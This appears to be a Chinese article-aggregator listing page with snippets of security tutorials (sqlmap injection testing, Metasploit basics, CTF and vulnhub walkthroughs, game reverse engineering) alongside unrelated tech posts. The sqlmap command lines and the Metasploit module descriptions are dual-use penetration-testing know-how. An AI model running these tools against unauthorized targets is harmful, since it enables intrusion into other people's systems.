    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more